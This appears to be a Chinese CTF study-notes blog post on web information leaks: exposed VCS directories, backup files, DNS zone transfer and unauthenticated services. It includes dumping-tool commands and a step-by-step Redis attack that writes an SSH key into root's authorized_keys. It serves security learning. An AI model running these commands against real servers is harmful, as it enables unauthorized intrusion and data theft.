CTF之信息泄漏

web源码泄漏

.hg源码泄漏:

漏洞成因:hg  init的时候会生成.hg,http://www.xx.com/.hg/,

工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/)

 

.git源码泄漏:

漏洞成因:在运行git init初始化代码库的时候,会在当前目录下产生一个.git的隐藏文件,用来记录代码的变更记录等,没有删除这个文件,导致泄漏,http://www.xxx.com/.git/config

工具:GitHack,dvcs-ripper,(GitHack.py http://www.xxx.com/.git,rip-hg.pl -v -u http://www.xx.com/.git/)

 

.DS_Store源码泄漏:

漏洞成因:在发布代码时,没有删除文件夹中隐藏的.DS_store,被发现后,获取了敏感的文件名等信息,http://www.xxx.com/.ds_store

工具:dsstoreexp,(python ds_store_exp.py http://www.xxx.com/.DS_Store)

 

网站备份压缩文件:

在网站的使用过程中,往往需要对网站中的文件进行修改,升级,此时就需要对网站整或其中某一页面进行备份,当备份文件或修改过程中的缓存文件因为各种原因被留在网站web目录下,而该目录又没有设置访问权限,就有可能导致备份文件被下载,导致信息泄漏,给服务器安全埋下隐患。.rar, .zip, .7z, .tar.gz, .bak, .swp, .txt, .html,

工具:可以使用一些扫描软件,进行扫描,如awvs之类的

像.swp文件,就是vim源文件泄漏,/.index.php.swp或/index.php~ 可以直接用vim -r inde.php来读取文件

 

SVN导致文件泄漏:

版本控制系统

工具:dvcs-ripper,Seay-Svn,(rip-svn.pl -v -u http://www.xxx.com/.svn/)

 

 

 

 

应用层泄漏

DNS域传送:

dns服务器的主备数据同步,使用的是域传送功能,如果使用默认配置文件进行配置,就会存在dns域传送漏洞(不手动添加allow-transfer)

工具:dig @1.1.1.1 xxx.com axfr (会泄漏一些信息)

 

HeartBleed:

利用https

 

从堆栈错误泄漏到RCE:

利用报错,泄漏信息,利用函数try{....}catche(e){e.printstack;}

 

未授权访问漏洞:

未授权访问----应用层服务的问题,服务启动后,没配置任何凭证,导致可以直接进入

弱口令---配置的密码过于简单常见

空口令---没配置密码

目前主要存在未授权访问漏洞的如下:

NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,Redis,ZooKeeper,

ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等,这些都是挖矿勒索的高发地带

 

如:

redis为授权访问漏洞,默认情况下会绑定在0.0.0.0:6379,这样会将redis服务暴露到公网上,如果没有开启认证的情况下,可以导致任意用户可以访问目标服务器,可以利用相关方法,在redis服务器上写入公钥,进而可以使用对应私钥直接登陆目标服务器。

1.本地生成公钥私钥

ssh-keygen -t rsa

2.把公钥写入xx.txt文件

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > xx.txt

3.连接redis写入文件

cat xx.txt | redis-cli -h 192.168.1.2 -x set crackit

redis-cli -h 192.168.1.2

192.168.1.2:6379> config set dir /root/.ssh/

192.168.1.2:6379> config get dir

1)"dir"

2)"/root/.ssh"

192.168.1.2:6379> config set dbfilename "authorized_keys"

192.168.1.2"6379> save

 

也可以使用msf里面成熟的exp来利用

 

 

 

 

友情链接  http://www.cnblogs.com/klionsec

                http://www.cnblogs.com/l0cm

                http://www.cnblogs.com/Anonyaptxxx

                http://www.feiyusafe.cn

 

posted @ 2019-04-24 15:10 Hydraxx 阅读(...) 评论(...) 编辑 收藏